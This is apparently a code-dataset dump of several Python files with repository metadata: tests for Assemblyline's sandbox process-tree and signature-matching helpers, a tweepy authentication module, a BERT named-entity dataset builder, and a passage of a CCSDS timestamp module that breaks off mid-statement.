@pytest.mark.parametrize("things_to_sort_by_timestamp, expected_result",
[
(None, []),
([], []),
(
[{"timestamp": 1}],
[{"timestamp": 1}]
),
(
[{"timestamp": 1}, {"timestamp": 2}],
[{"timestamp": 1}, {"timestamp": 2}]
),
(
[{"timestamp": 1}, {"timestamp": 1}],
[{"timestamp": 1}, {"timestamp": 1}]
),
(
[{"timestamp": 2}, {"timestamp": 1}],
[{"timestamp": 1}, {"timestamp": 2}]
),
(
[{"timestamp": 3}, {"timestamp": 2}, {"timestamp": 1}],
[{"timestamp": 1}, {"timestamp": 2}, {"timestamp": 3}]
),
]
)
def test_sort_things_by_timestamp(things_to_sort_by_timestamp, expected_result, dummy_event_class):
from assemblyline_v4_service.common.dynamic_service_helper import Events
dummy_things = []
dummy_results = []
if things_to_sort_by_timestamp is None:
assert Events._sort_things_by_timestamp(dummy_things) == []
return
for thing in things_to_sort_by_timestamp:
dummy_things.append(dummy_event_class(thing))
for result in expected_result:
dummy_results.append(dummy_event_class(result))
actual_result = Events._sort_things_by_timestamp(dummy_things)
for index, item in enumerate(actual_result):
assert item.__dict__ == dummy_results[index].__dict__
@staticmethod
@pytest.mark.parametrize("events, expected_events_dict",
[
([{"pid": 1, "image": "blah", "timestamp": 1, "guid": None}], {1: {'guid': None, 'image': 'blah', 'pid': 1, 'timestamp': 1}}),
([{"pid": 1, "image": "blah", "timestamp": 1, "guid": None}, {"pid": 2, "image": "blah", "timestamp": 1, "guid": None}], {1: {'guid': None, 'image': 'blah', 'pid': 1, 'timestamp': 1}, 2: {'guid': None, 'image': 'blah', 'pid': 2, 'timestamp': 1}}),
([{"pid": 1, "image": "blah", "timestamp": 1, "guid": "a"}, {"pid": 2, "image": "blah", "timestamp": 1, "guid": "b"}], {"a": {'guid': "a", 'image': 'blah', 'pid': 1, 'timestamp': 1}, "b": {'guid': "b", 'image': 'blah', 'pid': 2, 'timestamp': 1}}),
]
)
def test_convert_events_to_dict(events, expected_events_dict):
from assemblyline_v4_service.common.dynamic_service_helper import Event, Events
event_objects = [Event(pid=event["pid"], image=event["image"], timestamp=event["timestamp"], guid=event["guid"]) for event in events]
assert Events._convert_events_to_dict(event_objects) == expected_events_dict
class TestSandboxOntology:
@staticmethod
@pytest.mark.parametrize("events, expected_events", [([], [])])
def test_init(events, expected_events):
from assemblyline_v4_service.common.dynamic_service_helper import SandboxOntology
so = SandboxOntology(events=events)
assert so.events == expected_events
@staticmethod
@pytest.mark.parametrize("processes_dict, expected_result",
[
# No processes
({}, []),
# One process
(
{1: {"pid": 1, "ppid": 1, "image": "blah", "command_line": "blah", "timestamp": 1}},
[{"pid": 1, "ppid": 1, "image": "blah", "command_line": "blah", "timestamp": 1, "children": []}]
),
# One parent process and one child process
(
{
1: {"pid": 1, "ppid": 1, "image": "blah", "command_line": "blah", "timestamp": 1},
2: {"pid": 2, "ppid": 1, "image": "blah", "command_line": "blah", "timestamp": 1},
},
[
{"pid": 1, "ppid": 1, "image": "blah", "command_line": "blah", "timestamp": 1,
"children":
[{"pid": 2, "ppid": 1, "image": "blah", "command_line": "blah", "timestamp": 1, "children": []},]
},
],
),
# Two unrelated processes
(
{
1: {"pid": 1, "ppid": 1, "image": "blah", "command_line": "blah", "timestamp": 1},
2: {"pid": 2, "ppid": 2, "image": "blah", "command_line": "blah", "timestamp": 1},
},
[
{"pid": 1, "ppid": 1, "image": "blah", "command_line": "blah", "timestamp": 1, "children": []},
{"pid": 2, "ppid": 2, "image": "blah", "command_line": "blah", "timestamp": 1, "children": []},
],
),
# Three processes consisting of a parent-child relationship and a rando process
(
{
1: {"pid": 1, "ppid": 1, "image": "blah", "command_line": "blah", "timestamp": 1},
2: {"pid": 2, "ppid": 2, "image": "blah", "command_line": "blah", "timestamp": 1},
3: {"pid": 3, "ppid": 2, "image": "blah", "command_line": "blah", "timestamp": 1},
},
[
{"pid": 1, "ppid": 1, "image": "blah", "command_line": "blah", "timestamp": 1, "children": []},
{"pid": 2, "ppid": 2, "image": "blah", "command_line": "blah", "timestamp": 1,
"children":
[{"pid": 3, "ppid": 2, "image": "blah", "command_line": "blah", "timestamp": 1, "children": []},]
},
],
),
# Three processes consisting of a grandparent-parent-child relationship and one rando process
(
{
1: {"pid": 1, "ppid": 1, "image": "blah", "command_line": "blah", "timestamp": 1},
2: {"pid": 2, "ppid": 1, "image": "blah", "command_line": "blah", "timestamp": 2},
3: {"pid": 3, "ppid": 2, "image": "blah", "command_line": "blah", "timestamp": 3},
4: {"pid": 4, "ppid": 4, "image": "blah", "command_line": "blah", "timestamp": 2},
},
[
{"pid": 1, "ppid": 1, "image": "blah", "command_line": "blah", "timestamp": 1,
"children":
[{"pid": 2, "ppid": 1, "image": "blah", "command_line": "blah", "timestamp": 2,
"children":
[{"pid": 3, "ppid": 2, "image": "blah", "command_line": "blah", "timestamp": 3,
"children": []}, ]}]
},
{"pid": 4, "ppid": 4, "image": "blah", "command_line": "blah", "timestamp": 2, "children": []}
],
),
# Four processes consisting of a grandparent-parent-parent-child relationship
(
{
1: {"pid": 1, "ppid": 1, "image": "blah", "command_line": "blah", "timestamp": 1},
2: {"pid": 2, "ppid": 1, "image": "blah", "command_line": "blah", "timestamp": 2},
3: {"pid": 3, "ppid": 1, "image": "blah", "command_line": "blah", "timestamp": 3},
4: {"pid": 4, "ppid": 2, "image": "blah", "command_line": "blah", "timestamp": 4},
},
[
{"pid": 1, "ppid": 1, "image": "blah", "command_line": "blah", "timestamp": 1,
"children":
[
{"pid": 2, "ppid": 1, "image": "blah", "command_line": "blah", "timestamp": 2,
"children":
[{"pid": 4, "ppid": 2, "image": "blah", "command_line": "blah", "timestamp": 4, "children": []}]},
{"pid": 3, "ppid": 1, "image": "blah", "command_line": "blah", "timestamp": 3, "children": []}
]
},
],
),
# Four processes consisting of a grandparent-parent-parent-child relationship with non-ordered times
(
{
1: {"pid": 1, "ppid": 1, "image": "blah", "command_line": "blah", "timestamp": 1},
2: {"pid": 2, "ppid": 1, "image": "blah", "command_line": "blah", "timestamp": 3},
3: {"pid": 3, "ppid": 1, "image": "blah", "command_line": "blah", "timestamp": 2},
4: {"pid": 4, "ppid": 2, "image": "blah", "command_line": "blah", "timestamp": 4},
},
[
{"pid": 1, "ppid": 1, "image": "blah", "command_line": "blah", "timestamp": 1,
"children":
[
{"pid": 3, "ppid": 1, "image": "blah", "command_line": "blah", "timestamp": 2,
"children": []},
{"pid": 2, "ppid": 1, "image": "blah", "command_line": "blah", "timestamp": 3,
"children":
[{"pid": 4, "ppid": 2, "image": "blah", "command_line": "blah", "timestamp": 4,
"children": []}]},
]
},
],
),
# Four processes consisting of a grandparent-parent-parent-child relationship with non-ordered times using guids
(
{
"a": {"pid": 1, "ppid": 1, "image": "blah", "command_line": "blah", "timestamp": 1, "guid": "a", "pguid": None},
"b": {"pid": 2, "ppid": 1, "image": "blah", "command_line": "blah", "timestamp": 3, "guid": "b", "pguid": "a"},
"c": {"pid": 3, "ppid": 1, "image": "blah", "command_line": "blah", "timestamp": 2, "guid": "c", "pguid": "a"},
"d": {"pid": 4, "ppid": 2, "image": "blah", "command_line": "blah", "timestamp": 4, "guid": "d", "pguid": "b"},
},
[
{"pid": 1, "ppid": 1, "image": "blah", "command_line": "blah", "timestamp": 1, "guid": "a", "pguid": None,
"children":
[
{"pid": 3, "ppid": 1, "image": "blah", "command_line": "blah", "timestamp": 2, "guid": "c", "pguid": "a",
"children": []},
{"pid": 2, "ppid": 1, "image": "blah", "command_line": "blah", "timestamp": 3, "guid": "b", "pguid": "a",
"children":
[{"pid": 4, "ppid": 2, "image": "blah", "command_line": "blah", "timestamp": 4, "guid": "d", "pguid": "b",
"children": []}]},
]
},
],
),
# Four processes consisting of a grandparent-parent-parent-child relationship with non-ordered times using guids
(
{
1: {"pid": 1, "ppid": 1, "image": "blah", "command_line": "blah", "timestamp": 1, "guid": None,
"pguid": None},
2: {"pid": 2, "ppid": 1, "image": "blah", "command_line": "blah", "timestamp": 3, "guid": None,
"pguid": None},
3: {"pid": 3, "ppid": 1, "image": "blah", "command_line": "blah", "timestamp": 2, "guid": None,
"pguid": None},
4: {"pid": 4, "ppid": 2, "image": "blah", "command_line": "blah", "timestamp": 4, "guid": None,
"pguid": None},
},
[
{"pid": 1, "ppid": 1, "image": "blah", "command_line": "blah", "timestamp": 1, "guid": None,
"pguid": None,
"children":
[
{"pid": 3, "ppid": 1, "image": "blah", "command_line": "blah", "timestamp": 2,
"guid": None, "pguid": None,
"children": []},
{"pid": 2, "ppid": 1, "image": "blah", "command_line": "blah", "timestamp": 3,
"guid": None, "pguid": None,
"children":
[{"pid": 4, "ppid": 2, "image": "blah", "command_line": "blah", "timestamp": 4,
"guid": None, "pguid": None,
"children": []}]},
]
},
],
),
]
)
def test_convert_processes_dict_to_tree(processes_dict, expected_result):
from assemblyline_v4_service.common.dynamic_service_helper import SandboxOntology
actual_result = SandboxOntology._convert_processes_dict_to_tree(processes_dict)
assert expected_result == actual_result
@staticmethod
@pytest.mark.parametrize("artifact_list",
[
None,
[],
[{"name": "blah", "path": "blah", "description": "blah", "to_be_extracted": True}],
]
)
def test_validate_artifacts(artifact_list):
from assemblyline_v4_service.common.dynamic_service_helper import SandboxOntology, Artifact
actual_validated_artifact_list = SandboxOntology._validate_artifacts(artifact_list)
if artifact_list is None:
artifact_list = []
for index, artifact in enumerate(artifact_list):
expected_artifact = Artifact(
name=artifact["name"],
path=artifact["path"],
description=artifact["description"],
to_be_extracted=artifact["to_be_extracted"]
)
assert check_artifact_equality(expected_artifact, actual_validated_artifact_list[index])
@staticmethod
@pytest.mark.parametrize("artifact, expected_result_section_title",
[
(None, None),
({"path": "blah", "name": "blah", "description": "blah", "to_be_extracted": True}, None),
({"path": "blah", "name": "123_hollowshunter/hh_process_123_blah.exe", "description": "blah", "to_be_extracted": True}, "HollowsHunter Injected Portable Executable"),
({"path": "blah", "name": "123_hollowshunter/hh_process_123_blah.shc", "description": "blah", "to_be_extracted": True}, None),
({"path": "blah", "name": "123_hollowshunter/hh_process_123_blah.dll", "description": "blah", "to_be_extracted": True}, "HollowsHunter DLL"),
]
)
def test_handle_artifact(artifact, expected_result_section_title):
from assemblyline_v4_service.common.dynamic_service_helper import SandboxOntology, Artifact
from assemblyline_v4_service.common.result import ResultSection, Heuristic
if artifact is None:
with pytest.raises(Exception):
SandboxOntology._handle_artifact(artifact, None)
return
expected_result_section = None
if expected_result_section_title is not None:
expected_result_section = ResultSection(expected_result_section_title)
expected_result_section.add_tag("dynamic.process.file_name", artifact["path"])
if expected_result_section_title == "HollowsHunter Injected Portable Executable":
heur = Heuristic(17)
heur.add_signature_id("hollowshunter_pe")
expected_result_section.heuristic = heur
parent_result_section = ResultSection("blah")
a = Artifact(
name=artifact["name"],
path=artifact["path"],
description=artifact["description"],
to_be_extracted=artifact["to_be_extracted"]
)
SandboxOntology._handle_artifact(a, parent_result_section)
if len(parent_result_section.subsections) > 0:
actual_result_section = parent_result_section.subsections[0]
else:
actual_result_section = None
if expected_result_section is None and actual_result_section is None:
assert True
else:
assert check_section_equality(actual_result_section, expected_result_section)
@staticmethod
@pytest.mark.parametrize("process_list, signatures, expected_result",
[
(None, [], {}),
([], [], {}),
([{"pid": 1, "ppid": 1, "image": "blah", "command_line": "blah", "timestamp": 1, "guid": None, "pguid": None}], [{"pid": 1, "name": "blah", "score": 1}], {1: {"pid": 1, "ppid": 1, "process_name": "blah", "process_pid": 1, "image": "blah", "command_line": "blah", "timestamp": 1, "guid": None, "pguid": None, "signatures": {"blah": 1}}}),
([{"pid": 2, "ppid": 1, "image": "blah", "command_line": "blah", "timestamp": 1, "guid": None, "pguid": None}], [{"pid": 1, "name": "blah", "score": 1}], {2: {"pid": 2, "ppid": 1, "process_name": "blah", "process_pid": 2, "image": "blah", "command_line": "blah", "timestamp": 1, "guid": None, "pguid": None, "signatures": {}}}),
([{"pid": 2, "ppid": 1, "image": "blah", "command_line": "blah", "timestamp": 1, "guid": "a", "pguid": None}], [{"pid": 1, "name": "blah", "score": 1}], {"a": {"pid": 2, "ppid": 1, "process_name": "blah", "process_pid": 2, "image": "blah", "command_line": "blah", "timestamp": 1, "guid": "a", "pguid": None, "signatures": {}}}),
([{"pid": 1, "ppid": 1, "image": "blah", "command_line": "blah", "timestamp": 1, "guid": "a", "pguid": None}], [{"pid": 1, "name": "blah", "score": 1}], {"a": {"pid": 1, "ppid": 1, "process_name": "blah", "process_pid": 1, "image": "blah", "command_line": "blah", "timestamp": 1, "guid": "a", "pguid": None, "signatures": {"blah": 1}}}),
]
)
def test_match_signatures_to_process_events(process_list, signatures, expected_result):
from assemblyline_v4_service.common.dynamic_service_helper import SandboxOntology
o = SandboxOntology(process_list)
actual_result = o._match_signatures_to_process_events(signature_dicts=signatures)
assert actual_result == expected_result
@staticmethod
@pytest.mark.parametrize("process_list, expected_result", [(None, []), ([], [])])
def test_get_process_tree(process_list, expected_result):
from assemblyline_v4_service.common.dynamic_service_helper import SandboxOntology
o = SandboxOntology(process_list)
actual_result = o.get_process_tree()
assert actual_result == expected_result
@staticmethod
@pytest.mark.parametrize("process_list, signatures, expected_result",
[
(None, [], []),
([], [], []),
([{"pid": 1, "ppid": 1, "image": "blah", "command_line": "blah", "timestamp": 1, "guid": "blah", "pguid": "blahblah"}], [{"pid": 1, "name": "blah", "score": 1}], [{"children": [], "pid": 1, "ppid": 1, "process_name": "blah", "process_pid": 1, "image": "blah", "command_line": "blah", "timestamp": 1, "guid": "blah", "pguid": "blahblah", "signatures": {"blah": 1}}]),
([{"pid": 2, "ppid": 1, "image": "blah", "command_line": "blah", "timestamp": 1, "guid": "blah", "pguid": "blahblah"}], [{"pid": 1, "name": "blah", "score": 1}], [{"children": [], "pid": 2, "ppid": 1, "process_name": "blah", "process_pid": 2, "image": "blah", "command_line": "blah", "timestamp": 1, "guid": "blah", "pguid": "blahblah", "signatures": {}}]),
]
)
def test_get_process_tree_with_signatures(process_list, signatures, expected_result):
from assemblyline_v4_service.common.dynamic_service_helper import SandboxOntology
o = SandboxOntology(process_list)
actual_result = o.get_process_tree_with_signatures(signatures=signatures)
assert actual_result == expected_result
@staticmethod
@pytest.mark.parametrize("events, expected_result",
[
(None, []),
([], []),
([{"pid": 1, "ppid": 1, "image": "blah", "command_line": "blah", "timestamp": 1.0, "guid": "blah", "pguid": "blah"}], [{"pid": 1, "ppid": 1, "image": "blah", "command_line": "blah", "timestamp": 1.0, "guid": "blah", "pguid": "blah"}]),
([{"protocol": "blah", "src_ip": "blah", "src_port": 1, "domain": "blah", "dest_ip": "blah", "dest_port": 1, "pid": 1, "image": "blah", "timestamp": 1.0, "guid": "blah"}], [{"protocol": "blah", "src_ip": "blah", "src_port": 1, "domain": "blah", "dest_ip": "blah", "dest_port": 1, "pid": 1, "image": "blah", "timestamp": 1.0, "guid": "blah"}]),
([{"pid": 1, "ppid": 1, "image": "blah", "command_line": "blah", "timestamp": 1.0, "guid": "blah", "pguid": "blah"}, {"protocol": "blah", "src_ip": "blah", "src_port": 1, "domain": "blah", "dest_ip": "blah", "dest_port": 1, "pid": 1, "image": "blah", "timestamp": 1.0, "guid": "blah"}], [{"pid": 1, "ppid": 1, "image": "blah", "command_line": "blah", "timestamp": 1.0, "guid": "blah", "pguid": "blah"}, {"protocol": "blah", "src_ip": "blah", "src_port": 1, "domain": "blah", "dest_ip": "blah", "dest_port": 1, "pid": 1, "image": "blah", "timestamp": 1.0, "guid": "blah"}]),
([{"pid": 1, "ppid": 1, "image": "blah", "command_line": "blah", "timestamp": 1.0, "guid": "blah", "pguid": "blah"}, {"protocol": "blah", "src_ip": "blah", "src_port": 1, "domain": "blah", "dest_ip": "blah", "dest_port": 1, "pid": 1, "image": "blah", "timestamp": 2.0, "guid": "blah"}], [{"pid": 1, "ppid": 1, "image": "blah", "command_line": "blah", "timestamp": 1.0, "guid": "blah", "pguid": "blah"}, {"protocol": "blah", "src_ip": "blah", "src_port": 1, "domain": "blah", "dest_ip": "blah", "dest_port": 1, "pid": 1, "image": "blah", "timestamp": 2.0, "guid": "blah"}]),
([{"pid": 1, "ppid": 1, "image": "blah", "command_line": "blah", "timestamp": 2.0, "guid": "blah", "pguid": "blah"}, {"protocol": "blah", "src_ip": "blah", "src_port": 1, "domain": "blah", "dest_ip": "blah", "dest_port": 1, "pid": 1, "image": "blah", "timestamp": 1.0, "guid": "blah"}], [{"protocol": "blah", "src_ip": "blah", "src_port": 1, "domain": "blah", "dest_ip": "blah", "dest_port": 1, "pid": 1, "image": "blah", "timestamp": 1.0, "guid": "blah"}, {"pid": 1, "ppid": 1, "image": "blah", "command_line": "blah", "timestamp": 2.0, "guid": "blah", "pguid": "blah"}]),
]
)
def test_get_events(events, expected_result):
from assemblyline_v4_service.common.dynamic_service_helper import SandboxOntology
so = SandboxOntology(events=events)
actual_result = so.get_events()
assert actual_result == expected_result
# TODO: implement this
# @staticmethod
# def test_run_signatures():
# from assemblyline_v4_service.common.dynamic_service_helper import SandboxOntology
# o = SandboxOntology()
# actual_result = o.run_signatures()
# assert actual_result is True
@staticmethod
@pytest.mark.parametrize("artifact_list, expected_result",
[
(None, None),
([], None),
([{"name": "blah", "path": "blah", "description": "blah", "to_be_extracted": True}], None),
([{"name": "blah", "path": "blah", "description": "blah", "to_be_extracted": False}], None),
]
)
def test_handle_artifacts(artifact_list, expected_result, dummy_request_class):
from assemblyline_v4_service.common.dynamic_service_helper import SandboxOntology
r = dummy_request_class()
o = SandboxOntology()
actual_result = o.handle_artifacts(artifact_list, r)
assert actual_result == expected_result
| 14,355 | 23,726 | 296 |
77ddeb03eb7a15446d85153cdcc54639ea8854ea | 435 | py | Python | _Dockerized/twitter_septellar/web/twitter.py | LukaszMalucha/Twitter-REST-API | 718c58a9e19b386ba2e6501efb36cbaf17bad421 | [
"MIT"
] | 7 | 2018-11-08T17:34:06.000Z | 2020-10-01T20:07:18.000Z | _Dockerized/twitter_septellar/web/twitter.py | LukaszMalucha/Twitter-REST-API | 718c58a9e19b386ba2e6501efb36cbaf17bad421 | [
"MIT"
] | 7 | 2020-01-28T22:36:02.000Z | 2022-02-10T00:12:32.000Z | _Dockerized/twitter_septellar/web/twitter.py | LukaszMalucha/Twitter-REST-API | 718c58a9e19b386ba2e6501efb36cbaf17bad421 | [
"MIT"
] | 3 | 2019-04-27T20:12:39.000Z | 2020-05-09T08:59:42.000Z | import os
import env
import tweepy
from tweepy import OAuthHandler
### Twitter Authentication
CONSUMER_KEY = os.environ.get("CONSUMER_KEY")
CONSUMER_SECRET = os.environ.get("CONSUMER_SECRET")
OAUTH_TOKEN = os.environ.get("OAUTH_TOKEN")
OAUTH_TOKEN_SECRET = os.environ.get("OAUTH_TOKEN_SECRET")
auth = OAuthHandler(CONSUMER_KEY, CONSUMER_SECRET)
auth.set_access_token(OAUTH_TOKEN, OAUTH_TOKEN_SECRET)
twitter_api = tweepy.API(auth)
| 25.588235 | 57 | 0.813793 | import os
import env
import tweepy
from tweepy import OAuthHandler
### Twitter Authentication
CONSUMER_KEY = os.environ.get("CONSUMER_KEY")
CONSUMER_SECRET = os.environ.get("CONSUMER_SECRET")
OAUTH_TOKEN = os.environ.get("OAUTH_TOKEN")
OAUTH_TOKEN_SECRET = os.environ.get("OAUTH_TOKEN_SECRET")
auth = OAuthHandler(CONSUMER_KEY, CONSUMER_SECRET)
auth.set_access_token(OAUTH_TOKEN, OAUTH_TOKEN_SECRET)
twitter_api = tweepy.API(auth)
| 0 | 0 | 0 |
391fd98b1c6b5c4da768afbb6746a484ab01e355 | 6,545 | py | Python | bner/dataset.py | jplu/BNER | 15953c6623a15f95457f3832decdfd4593241c2a | [
"Apache-2.0"
] | 4 | 2019-04-25T12:06:29.000Z | 2021-11-26T16:45:30.000Z | bner/dataset.py | jplu/BNER | 15953c6623a15f95457f3832decdfd4593241c2a | [
"Apache-2.0"
] | 3 | 2020-09-25T18:51:52.000Z | 2022-02-09T23:32:31.000Z | bner/dataset.py | jplu/BNER | 15953c6623a15f95457f3832decdfd4593241c2a | [
"Apache-2.0"
] | null | null | null | # coding=utf-8
import collections
import pandas as pd
import tensorflow as tf
import _pickle as pickle
from absl import logging
from transformers import BertTokenizer
LABELS = []
if __name__ == "__main__":
main()
| 32.241379 | 119 | 0.608709 | # coding=utf-8
import collections
import pandas as pd
import tensorflow as tf
import _pickle as pickle
from absl import logging
from transformers import BertTokenizer
LABELS = []
class InputExample(object):
def __init__(self, text=None, labels=None):
# List of tokens
self.text = text
# List of labels
self.labels = labels
class InputFeatures(object):
def __init__(self, input_ids, input_mask, segment_ids, label_ids):
self.input_ids = input_ids
self.input_mask = input_mask
self.segment_ids = segment_ids
self.label_ids = label_ids
def _load_dataset(name):
dataset = {"text": [], "labels": []}
logging.info(name + ": " + str(tf.io.gfile.exists(name)))
with tf.io.gfile.GFile(name) as f:
words = []
labels = []
for line in f:
contents = line.strip()
tokens = contents.split(' ')
if contents.startswith("-DOCSTART-"):
continue
if len(tokens) == 2 or len(tokens) == 4:
words.append(tokens[0])
labels.append(tokens[-1])
else:
if len(contents) == 0 and len(words) > 0:
for l in labels:
if l not in LABELS:
LABELS.append(l)
dataset["text"].append(words)
dataset["labels"].append(labels)
words = []
labels = []
return pd.DataFrame.from_dict(dataset)
def load_examples(tsv_file):
dataset = _load_dataset(tsv_file)
dataset_examples = dataset.apply(
lambda x: InputExample(text=x["text"], labels=x["labels"]), axis=1)
return dataset_examples
def convert_single_example(ex_index, example, max_seq_length, tokenizer):
label_id_map = {}
for (i, label) in enumerate(LABELS, 1):
label_id_map[label] = i
text = example.text
labels = example.labels
tokens = []
label_ids = []
for word, label in zip(text, labels):
tokenized_word = tokenizer.tokenize(word)
tokens.extend(tokenized_word)
label_ids.extend([label_id_map[label]] + [0] * (len(tokenized_word) - 1))
if len(tokens) >= max_seq_length - 2:
tokens = tokens[0:(max_seq_length - 2)]
label_ids = label_ids[0:(max_seq_length - 2)]
# Add [SEP] token
tokens.append("[SEP]")
label_ids.append(0)
segment_ids = [0] * len(tokens)
# Add [CLS] token
tokens = ["[CLS]"] + tokens
label_ids = [0] + label_ids
segment_ids = [0] + segment_ids
input_ids = tokenizer.convert_tokens_to_ids(tokens)
input_mask = [1] * len(tokens)
while len(input_ids) < max_seq_length:
input_ids.append(0)
input_mask.append(0)
segment_ids.append(0)
label_ids.append(0)
assert len(input_ids) == max_seq_length
assert len(input_mask) == max_seq_length
assert len(segment_ids) == max_seq_length
assert len(label_ids) == max_seq_length
if ex_index < 5:
logging.info("*** Example ***")
logging.info("tokens: %s" % " ".join([str(x) for x in tokens]))
logging.info("input_ids: %s" % " ".join([str(x) for x in input_ids]))
logging.info("input_mask: %s" % " ".join([str(x) for x in input_mask]))
logging.info("segment_ids: %s" % " ".join([str(x) for x in segment_ids]))
logging.info("label_ids: %s" % " ".join([str(x) for x in label_ids]))
feature = InputFeatures(
input_ids=input_ids,
input_mask=input_mask,
segment_ids=segment_ids,
label_ids=label_ids,
)
return feature
def file_based_convert_examples_to_features(examples, max_seq_length, tokenizer,
output_file):
writer = tf.io.TFRecordWriter(output_file)
batch_tokens = []
for (ex_index, example) in enumerate(examples):
if ex_index % 5000 == 0:
logging.info("Writing example %d of %d" % (ex_index, len(examples)))
feature = convert_single_example(ex_index, example, max_seq_length, tokenizer)
batch_tokens.append(example.text)
def create_int_feature(values):
f = tf.train.Feature(int64_list=tf.train.Int64List(value=list(values)))
return f
features = collections.OrderedDict()
features["input_ids"] = create_int_feature(feature.input_ids)
features["input_mask"] = create_int_feature(feature.input_mask)
features["segment_ids"] = create_int_feature(feature.segment_ids)
features["label_ids"] = create_int_feature(feature.label_ids)
tf_example = tf.train.Example(features=tf.train.Features(feature=features))
writer.write(tf_example.SerializeToString())
writer.close()
return batch_tokens
def create_features(max_seq_len, tokenizer, train_tsv, test_tsv, train_tfrecord_file,
eval_tfrecord_file, metadata_file):
global LABELS
if tf.io.gfile.exists(train_tfrecord_file):
tf.io.gfile.remove(train_tfrecord_file)
if tf.io.gfile.exists(eval_tfrecord_file):
tf.io.gfile.remove(eval_tfrecord_file)
if tf.io.gfile.exists(metadata_file):
tf.io.gfile.remove(metadata_file)
train_input_examples = load_examples(train_tsv)
eval_input_examples = load_examples(test_tsv)
_ = file_based_convert_examples_to_features(train_input_examples, max_seq_len,
tokenizer, train_tfrecord_file)
batch_tokens = file_based_convert_examples_to_features(eval_input_examples,
max_seq_len,
tokenizer,
eval_tfrecord_file)
metadata = {"max_seq_len": max_seq_len, "labels": LABELS,
"train_number_examples": len(train_input_examples),
"batch_tokens": batch_tokens}
with tf.io.gfile.GFile(metadata_file, "w") as f:
pickle.dump(metadata, f)
def main():
logging.set_verbosity(logging.INFO)
tokenizer = BertTokenizer.from_pretrained("bert-base-multilingual-cased", do_lower_case=False)
create_features(128, tokenizer, "../datasets/train.conll", "../datasets/test.conll", "../datasets/train.tf_record",
"../datasets/eval.tf_record", "../datasets/metadata.pkl")
if __name__ == "__main__":
main()
| 6,066 | 13 | 236 |
e14c526540e2050bac5913105a05f8a95d2defad | 4,511 | py | Python | spacepackets/ccsds/time.py | robamu-org/py-spacepackets | 522b021ba5690f97a4b74ae8b110762a32eb9b19 | [
"Apache-2.0"
] | null | null | null | spacepackets/ccsds/time.py | robamu-org/py-spacepackets | 522b021ba5690f97a4b74ae8b110762a32eb9b19 | [
"Apache-2.0"
] | 3 | 2021-10-05T09:29:45.000Z | 2022-02-12T15:46:43.000Z | spacepackets/ccsds/time.py | robamu-org/py-spacepackets | 522b021ba5690f97a4b74ae8b110762a32eb9b19 | [
"Apache-2.0"
] | 1 | 2022-03-04T17:25:29.000Z | 2022-03-04T17:25:29.000Z | from __future__ import annotations
import datetime
import math
import enum
import time
from abc import abstractmethod
DAYS_CCSDS_TO_UNIX = -4383
SECONDS_PER_DAY = 86400
UNIX_EPOCH = datetime.datetime.utcfromtimestamp(0)
def convert_unix_days_to_ccsds_days(unix_days: int) -> int:
"""Convert Unix days to CCSDS days
CCSDS epoch: 1958 Januar 1
Unix epoch: 1970 January 1
"""
return unix_days - DAYS_CCSDS_TO_UNIX
def convert_ccsds_days_to_unix_days(ccsds_days: int) -> int:
"""Convert CCSDS days to Unix days
CCSDS epoch: 1958 Januar 1
Unix epoch: 1970 January 1
"""
return ccsds_days + DAYS_CCSDS_TO_UNIX
def read_p_field(p_field: int) -> CcsdsTimeCodeId:
"""Read the p field and return the CCSDS Time Code ID
:param p_field:
:return:
:raise IndexError: P field has invalid value
"""
return CcsdsTimeCodeId((p_field & 0x70) >> 4)
class CdsShortTimestamp(CcsdsTimeCode):
"""Unpacks the time datafield of the TM packet. Right now, CDS Short timeformat is used,
and the size of the time stamp is expected to be seven bytes.
"""
CDS_SHORT_ID = 0b100
TIMESTAMP_SIZE = 7
@classmethod
@classmethod
@classmethod
@staticmethod
def init_from_current_time() -> CdsShortTimestamp:
"""Returns a seven byte CDS short timestamp with the current time"""
unix_days = (datetime.datetime.utcnow() - UNIX_EPOCH).days
seconds = time.time()
fraction_ms = seconds - math.floor(seconds)
days_ms = int((seconds % SECONDS_PER_DAY) * 1000 + fraction_ms)
time_packet = CdsShortTimestamp.init_from_unix_days(
unix_days=unix_days, ms_of_day=days_ms
)
return time_packet
@abstractmethod
@abstractmethod
| 31.110345 | 92 | 0.656174 | from __future__ import annotations
import datetime
import math
import enum
import time
from abc import abstractmethod
DAYS_CCSDS_TO_UNIX = -4383
SECONDS_PER_DAY = 86400
UNIX_EPOCH = datetime.datetime.utcfromtimestamp(0)
class CcsdsTimeCodeId(enum.IntEnum):
NONE = 0
CUC_CCSDS_EPOCH = 0b001
CUC_AGENCY_EPOCH = 0b010
CDS = 0b100
CCS = 0b101
def convert_unix_days_to_ccsds_days(unix_days: int) -> int:
"""Convert Unix days to CCSDS days
CCSDS epoch: 1958 Januar 1
Unix epoch: 1970 January 1
"""
return unix_days - DAYS_CCSDS_TO_UNIX
def convert_ccsds_days_to_unix_days(ccsds_days: int) -> int:
"""Convert CCSDS days to Unix days
CCSDS epoch: 1958 Januar 1
Unix epoch: 1970 January 1
"""
return ccsds_days + DAYS_CCSDS_TO_UNIX
def read_p_field(p_field: int) -> CcsdsTimeCodeId:
"""Read the p field and return the CCSDS Time Code ID
:param p_field:
:return:
:raise IndexError: P field has invalid value
"""
return CcsdsTimeCodeId((p_field & 0x70) >> 4)
class CcsdsTimeCode:
@abstractmethod
def pack(self) -> bytearray:
self.ccsds_id = CcsdsTimeCodeId.NONE
return bytearray()
@abstractmethod
def return_unix_seconds(self) -> int:
return 0
@abstractmethod
def return_time_string(self) -> str:
return ""
class CdsShortTimestamp(CcsdsTimeCode):
"""Unpacks the time datafield of the TM packet. Right now, CDS Short timeformat is used,
and the size of the time stamp is expected to be seven bytes.
"""
CDS_SHORT_ID = 0b100
TIMESTAMP_SIZE = 7
def __init__(self, ccsds_days: int, ms_of_day: int):
self.ccsds_id = CcsdsTimeCodeId.CDS
self.p_field = CdsShortTimestamp.CDS_SHORT_ID << 4
# CCSDS recommends a 1958 Januar 1 epoch, which is different from the Unix epoch
self.ccsds_days = ccsds_days
self.unix_days = convert_ccsds_days_to_unix_days(self.ccsds_days)
self.unix_seconds = self.unix_days * (24 * 60 * 60)
self.ms_of_day = ms_of_day
self.seconds_of_day = self.ms_of_day / 1000.0
self.unix_seconds += self.seconds_of_day
if self.unix_seconds < 0:
date = datetime.datetime(1970, 1, 1) + datetime.timedelta(
seconds=self.unix_seconds
)
else:
date = datetime.datetime.utcfromtimestamp(self.unix_seconds)
self.time_string = date.strftime("%Y-%m-%d %H:%M:%S.%f")
@classmethod
def init_from_unix_days(cls, unix_days: int, ms_of_day: int) -> CdsShortTimestamp:
return cls(
